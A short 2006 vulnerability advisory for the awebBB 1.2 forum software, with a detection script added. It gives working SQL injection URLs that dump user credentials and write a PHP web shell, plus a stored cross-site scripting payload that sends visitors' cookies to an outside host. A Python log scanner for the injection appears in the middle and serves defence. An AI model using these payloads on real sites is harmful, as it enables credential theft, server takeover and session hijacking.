securityvulns SECURITYVULNS:DOC:12115
Apr 10, 2006

awebBB 1.2 Vuln

  1. SQL Injection

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,username,password,0,0,0%20from%20users/*

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER(),0,0,0/*

If magic_quotes_gpc is off:

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,'<?%20passthru($_GET[cmd])%20?>',0,0,0,0,0%20from%20users%20INTO%20OUTFILE%20'/PATH/shell.php'/*

AND

/shell.php?cmd=ls
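
Detection for the rowstart injection above, as an added example (not part of the original advisory or of awebBB): it scans access-log lines for /search.php requests whose rowstart is not a plain non-negative integer. The log lines are constructed, and treating rowstart as an integer paging offset is an assumption based on the requests shown.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Apr/2006:12:00:01 +0000] "GET /search.php?a=1&q=as&rowstart=20 HTTP/1.1" 200 5120
192.0.2.44 - - [10/Apr/2006:12:00:07 +0000] "GET /search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER(),0,0,0/* HTTP/1.1" 200 734
192.0.2.10 - - [10/Apr/2006:12:00:09 +0000] "GET /index.php HTTP/1.1" 200 2210
192.0.2.44 - - [10/Apr/2006:12:00:15 +0000] "GET /search.php?a=1&q=union%20rules&rowstart=0 HTTP/1.1" 200 4100
192.0.2.51 - - [10/Apr/2006:12:00:21 +0000] "GET /search.php?a=1&q=as&rowstart=-1 HTTP/1.1" 200 90
"""

# Client address and request target from a combined-log-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
# Assumption: a legitimate rowstart is a non-negative integer paging offset.
VALID_ROWSTART = re.compile(r"[0-9]+")


def rowstart_findings(log_text):
    """Return (client, decoded rowstart) for each suspicious search.php request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/search.php"):
            continue
        # parse_qs percent-decodes, so %20UNION%20 is seen as " UNION ".
        for value in parse_qs(url.query, keep_blank_values=True).get("rowstart", []):
            if not VALID_ROWSTART.fullmatch(value):
                findings.append((client, value))
    return findings


if __name__ == "__main__":
    for client, value in rowstart_findings(SAMPLE_LOG):
        print(f"{client} rowstart={value!r}")
```

Checking the parameter's type instead of matching SQL keywords keeps the ordinary search for "union rules" from being flagged. The same rule applied in the application (accept rowstart only if it is all digits before it reaches the query) closes the injection point rather than only detecting it.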

  2. Cross Site Scripting

/ndis.php

Insufficient checking of fpost.

<div class="blue-box"><div class="breaker"><a
id="id"></a><b>Re:Re:Re:test</b> by <a
href="dpost.php?p=test">test</a></div><table cellpadding="0" cellspacing="0"
border="0" width="100%"><tr><td height="80" width="80" rowspan="2"><img
src="images/af.jpg" border="0" align="left" width="80" height="80"></td><td
valign="top"><div class="breaker"><script>document.write("<img
src='http://bug/xss.php?c=&quot;+ document.cookie
+"'style=visibility:hidden;'>");</script></div></td></tr><tr><td
valign="bottom"><div align="right"><i>Love Life</i><br>15:24:04 -
2006-04-08</div></td></tr></table><div class="breaker"></div><div
id="masterdiv12"><div class="menutitle"
onclick="SwitchPlanet('sub12')">&nbsp~ <a href="#12">Reply</a></div><span
class="submenu12" id="sub12">

http://www.securitylab.ru/forum/read.php?FID=16&TID=23108


Email: [email protected]
ICQ: 294308